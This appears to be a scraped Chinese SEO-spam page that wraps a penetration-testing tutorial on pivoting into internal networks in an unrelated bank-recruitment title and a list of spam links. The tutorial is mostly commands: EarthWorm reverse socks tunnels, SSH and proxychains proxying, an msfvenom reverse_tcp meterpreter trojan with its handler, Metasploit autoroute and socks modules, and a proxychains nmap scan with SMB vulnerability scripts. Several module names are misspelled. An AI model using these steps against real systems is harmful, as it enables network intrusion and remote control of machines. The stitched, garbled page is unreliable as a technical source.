当前位置: 首页 > news >正文

中国建设银行最新招聘信息网站wordpress加入会员

中国建设银行最新招聘信息网站,wordpress加入会员,专门做水产海鲜的网站吗,展会展厅设计公司目录 内网渗透 Nc使用详解 Nc监听和探测 Nc传文件 termite内网穿透工具 ssh代理内网穿透 ssh配置socket代理 MSF多级网络穿透 内网渗透 Nc使用详解 Nc监听和探测 Nc传文件 termite内网穿透工具 1、termite 之前叫ew (可以进行正向连接,可以…

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透


内网渗透

Nc使用详解
Nc监听和探测


Nc传文件


termite内网穿透工具


1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:./ew_for_linux64 -s rcsocks -l 1111 -e 2222#将1111端口监听到的本地数据转发到 web服务器的2222端口# 通过1111端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 10003、windows和linux差不多!

ssh代理内网穿透




正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!

ssh配置socket代理


1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081代理完成之后就可以使用本地流量进行内网信息收集了

MSF多级网络穿透


1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!
http://www.yayakq.cn/news/422387/

相关文章:

  • 做海报的网站类似于创客贴wordpress page 分页
  • 对自己做的网站总结手机网站推广服务
  • 自己可以做微网站吗seo关键词排名技术
  • 北京住房与城乡建设部网站计算机软件开发就业前景
  • 锡林郭勒盟建设厅官方网站软件综合课设做网站
  • 网站视频存储方案银川如何做百度的网站
  • 城乡建设网站wordpress页面标题字号
  • 游戏网站用户建设需求已有网站开发安卓app
  • 阿里云备案要关网站吗多语种网站建设
  • 山东国舜建设集团网站全屏企业网站
  • 商城网站服务器商务网站内容维护和管理的范围
  • 深圳市光明建设发展集团网站做原型的素材网站
  • 沈阳公司网站建设搭建网站服务器
  • wordpress建一个网站公司建站有哪些优势
  • 模型外包网站深圳装修公司生产厂家
  • 手机网站开发 视频教程全网自媒体平台大全
  • wordpress 网站备份app优化网站开发
  • 宁波城乡住房建设厅网站wordpress 插件 重命名
  • 我国档案网站建设研究论文龙游住房和城乡建设局网站
  • 曲阜网站制作西安官网优化哪家公司好
  • 网站开发设计软件拖拽式网站建设
  • 宜春市网站建设wordpress安卓ios应用
  • 佛山关键词网站排名建湖做网站的价格
  • 哪些属于网站评论陕西建设厅证件查询网站
  • 网站开发平台工具电商型网站设计企业
  • 网站建设丂金手指科杰高端的定义
  • 检察机关门户网站建设工作自查报告南宁网站制作哪家好
  • 西电信息化建设网站制作微信网站模板下载
  • 太原市建设局网站首页wordpress建立网站吗
  • 怎么做淘宝网站赚钱吗linux wordpress 域名